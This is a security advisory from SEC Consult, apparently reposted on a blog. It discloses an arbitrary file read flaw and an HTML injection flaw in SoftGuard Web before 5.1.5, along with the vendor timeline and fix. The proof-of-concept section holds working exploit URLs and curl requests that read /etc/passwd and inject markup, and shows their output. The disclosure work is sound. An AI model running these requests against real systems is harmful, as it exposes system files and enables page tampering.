SEC Consult Vulnerability Lab Security Advisory < 20220609-0 >
\n=======================================================================
\ntitle: Multiple vulnerabilities
\nproduct: SoftGuard SNMP Network Management Extension
\nvulnerable version: SoftGuard Web (SGW) < 5.1.5
\nfixed version: SoftGuard version 5.1.5 from 2022-06-01
\nCVE number: CVE-2022-31201, CVE-2022-31202
\nimpact: High
\nhomepage: https:\/\/gravitate.eu (reseller)
\nfound: 2022-04-14
\nby: Philipp Espernberger (Office Linz)
\nSEC Consult Vulnerability Lab<\/p>\n
An integrated part of SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n
https:\/\/www.sec-consult.com<\/p>\n
=======================================================================<\/p>\n
Vendor description:
\n——————-
\nThere is no public description available for this vendor\/product. The following
\ndescription was provided as documentation:<\/p>\n
“SoftGuard is a network management extension which collects inventory-, analysis-
\nand debugging data of devices and networks at least once a day. SoftGuard has an
\nopen structure, is built simple, is easily expandable, easy to use and is laid out
\nfor large scale networks. The data collection is performed with the protocols SNMP
\nsupporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,
\nhttps, NetBIOS\/IP, ICMP … complemented by SNMP if required.<\/p>\n
The SoftGuard Suite consists of three parts:<\/p>\n
* SoftGuard Network Center (SNC)
\n* SoftGuard Host Center (SHC)
\n* SoftGuard Monitor Center (SMC)<\/p>\n
Aditionally there are a bunch of common and customer specific expansions like
\nSoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),
\nNetwork Access Points (NAP), Technician Access Point (TAP), etc.”<\/p>\n
Business recommendation:
\n————————
\nSEC Consult recommends to update to the latest version of SoftGuard (network management
\nextension).<\/p>\n
An in-depth security analysis performed by security professionals is highly
\nadvised, to identify and resolve potential further critical security issues.<\/p>\n
Vulnerability overview\/description:
\n———————————–
\n1) File System Access (CVE-2022-31202)
\nThe export function allows authenticated attackers to download any
\narbitrary local file from the file system due to insufficient input
\nvalidation. The unfiltered URL parameter query enables an attacker to
\naccess arbitrary local files. This allows the attacker to define the
\ncomplete path and the filename by himself. Files that include passwords
\nand other sensitive information can be accessed.
\nFurthermore, the built-in man functionality also allows attackers to
\nread any arbitrary local file from the file system.<\/p>\n
2) HTML Injection (CVE-2022-31201)
\nVarious components do not properly sanitize\/encode user input. This
\nleads to HTML injection vulnerabilities. By exploiting this vulnerability,
\nan attacker can include arbitrary HTML into the affected web page. The
\ncode is executed in the context of the victim’s browser when visiting
\nthe manipulated URL. The vulnerability can be used to change the contents
\nof the displayed site or redirect to other sites.<\/p>\n
During the security assessment it was not possible to execute JavaScript
\ncode because the security headers Content-Security-Policy and
\nX-Content-Type-Options are preventing the execution.<\/p>\n
Proof of concept:
\n—————–
\n1) File System Access (CVE-2022-31202)
\n1a) Export functionality
\nIn order to access arbitrary local files, the export function as authenticated
\nuser (Administration -> User -> Access -> Export) can be used. The following URL
\nwas used to set the filename to \/etc\/passwd
\n===============================================================================
\nhttps:\/\/$host:8016\/sgw\/export?dbs=file&db=DefUser_access_$username_db%2e
\n1649426888398872%2etmp&query=file%3a\/etc\/passwd’<\/p>\n
===============================================================================<\/p>\n
The newly set filename (\/etc\/passwd) can be exported and downloaded via the
\nexecution button. Afterwards the content of the file gets downloaded successfully.
\n===============================================================================
\nroot:x:0:0:root:\/root:\/bin\/bash
\nbin:x:1:1:bin:\/bin:\/sbin\/nologin
\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin
\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin
\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin
\nsync:x:5:0:sync:\/sbin:\/bin\/sync
\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin
\nftp:x:14:50:FTP User:\/var\/ftp:\/sbin\/nologin
\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin
\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin
\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin
\n[…]\n===============================================================================<\/p>\n
1b) MAN functionality
\nThe following curl command shows how an authenticated attacker can gain access
\nto any arbitrary local file:
\n===============================================================================
\ncurl ‘https:\/\/$host:8016\/cgi-bin\/man.tcl’ -H ‘Authorization: Basic […]’
\n–data ‘act=1&x=%2Fetc%2Fpasswd&submit=Execute’ –compressed –insecure<\/p>\n
===============================================================================<\/p>\n
The curl response includes the contents of the file:
\n===============================================================================
\n<!DOCTYPE html>
\n<html lang=”en”><head><meta charset=”UTF-8″ \/>
\n[…]\n<pre>
\nroot:x:0:0:root:\/root:\/bin\/bash
\nbin:x:1:1:bin:\/bin:\/sbin\/nologin
\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin
\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin
\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin
\nsync:x:5:0:sync:\/sbin:\/bin\/sync
\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin
\nftp:x:14:50:FTP User:\/var\/ftp:\/sbin\/nologin
\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin
\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin
\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin
\n[…]\n===============================================================================<\/p>\n
2) HTML Injection (CVE-2022-31201)
\nWhen a new graph is created an authenticated attacker controls the GET parameters
\nand can inject malicious content. The following curl command shows how an
\nauthenticated attacker can inject HTML code:
\n===============================================================================
\ncurl ‘https:\/\/$host:8016\/sgw\/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-
\nConsult%3C\/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5’
\n-H ‘Authorization: Basic […]’ –compressed –insecure<\/p>\n
===============================================================================<\/p>\n
The curl response includes the injected HTML code <h1>SEC Consult<\/h1>:
\n===============================================================================
\n<!DOCTYPE html>
\n<html lang=”en”>
\n<head>
\n<meta charset=”UTF-8″\/>
\n<title>SGW – Graph: Node<\/title>
\n[…]\n<\/head>
\n<body class=”master”>
\n[…]\n<caption>\u22113, Status<h1>SEC Consult<\/h1>, #11212<\/caption>
\n[…]\n<tr><td>Status<h1>SEC Consult<\/h1><\/td>
\n[…]\n<\/body><\/html>
\n===============================================================================<\/p>\n
Vulnerable \/ tested versions:
\n—————————–
\nThe following version has been tested and found to be vulnerable:
\n* SoftGuard Web (SGW) 5.1.3<\/p>\n
The vendor provided the following information regarding the affected versions:<\/p>\n
1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)
\n1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998\/99)
\n2) since SoftGuard 3.6.0 (2009-10-31) \/ SoftGuard 3.6.6 (2011-02-15) with
\nSoftGuard Web 2.6.0\/2.6.6<\/p>\n
Vendor contact timeline:
\n————————
\n2022-05-11: Contacting vendor through direct email address.
\n2022-05-11: Sent encrypted security advisory to vendor
\n2022-05-12: Received feedback from the vendor for the security advisory
\n2022-05-16: Received confirmation that a new version of SoftGuard was
\nalready rolled out to the customers which included the fix
\n2022-05-16: Received additional information which versions are vulnerable
\n2022-05-19: Received CVE numbers.
\n2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection
\nstill works at other endpoints, other issues are fixed.
\n2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June.
\n2022-06-01: Vendor releases patched version 5.1.5.
\n2022-06-09: Coordinated release of security advisory.<\/p>\n
Solution:
\n———
\nThe vendor rolled out new software versions. Affected users should verify that
\nthey are using the latest version available (5.1.5 from 2022-06-01 or higher).<\/p>\n
Workaround:
\n———–
\nNone<\/p>\n
Advisory URL:
\n————-
\nhttps:\/\/sec-consult.com\/vulnerability-lab\/<\/p>\n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n
SEC Consult Vulnerability Lab<\/p>\n
SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n
About SEC Consult Vulnerability Lab
\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
\nAtos company. It ensures the continued knowledge gain of SEC Consult in the
\nfield of network and application security to stay ahead of the attacker. The
\nSEC Consult Vulnerability Lab supports high-quality penetration testing and
\nthe evaluation of new offensive and defensive technologies for our customers.
\nHence our customers obtain the most current information about vulnerabilities
\nand valid recommendation about the risk profile of new technologies.<\/p>\n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\nInterested to work with the experts of SEC Consult?
\nSend us your application https:\/\/sec-consult.com\/career\/<\/p>\n
Interested in improving your cyber security with the experts of SEC Consult?
\nContact our local offices https:\/\/sec-consult.com\/contact\/
\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n
Mail: security-research at sec-consult dot com
\nWeb: https:\/\/www.sec-consult.com
\nBlog: http:\/\/blog.sec-consult.com
\nTwitter: https:\/\/twitter.com\/sec_consult<\/p>\n
EOF P. Espernberger \/ @2022<\/p>\n","protected":false},"excerpt":{"rendered":"
SEC Consult Vulnerability Lab Security Advisory < 20220609-0 > ======================================================================= title: Multiple vulnerabilities product: SoftGuard SNMP Network Management Extension vulnerable version: SoftGuard Web (SGW) < 5.1.5 fixed version: SoftGuard version 5.1.5 from 2022-06-01 CVE number: CVE-2022-31201, CVE-2022-31202 impact: High homepage: https:\/\/gravitate.eu (reseller) found: 2022-04-14 by: Philipp Espernberger (Office Linz) SEC Consult Vulnerability Lab An integrated …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25981","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25981"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25981\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25981"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25981"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}